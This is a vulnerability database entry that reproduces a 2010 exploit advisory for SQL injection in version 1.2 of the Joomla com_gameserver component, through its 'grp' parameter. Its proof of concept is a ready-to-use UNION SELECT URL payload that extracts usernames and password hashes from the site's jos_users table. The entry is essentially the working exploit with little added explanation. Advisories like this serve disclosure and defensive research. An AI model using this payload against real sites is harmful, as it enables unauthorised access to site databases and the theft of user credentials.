Joomla Component com_gameserver SQL Injection Vulnerability

2010-01-23T00:00:00
ID SSV:18989
Type seebug
Reporter Root
Modified 2010-01-23T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: Joomla (com_gameserver) SQL Injection Vulnerability
# Date: 2010-01-22
# Author: B-Hunt3|2
# Software Link: http://joomlacode.org/gf/project/gameserver/frs/
# Version: 1.2
# CVE : N/A
 
[~]>> ...[BEGIN ADVISORY]...
 
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
[~]>> TITLE: Joomla (com_gameserver) SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: Demo Site
 
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
[~]>> DESCRIPTION: Input var "grp" is vulnerable to SQL code injection.
[~]>> AFFECTED VERSIONS: Confirmed in 1.2 but probably other versions also.
[~]>> RISK: High/Medium
[~]>> IMPACT: Execute Arbitrary SQL queries
 
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
[~]>> PROOF OF CONCEPT:
 
[~]>> http://server/component/gameserver/?view=gameserver&grp=[SQL]
[~]>> http://server/component/gameserver/?view=gameserver&grp=-1'+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%23
 
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 
[~]>> ...[END ADVISORY]...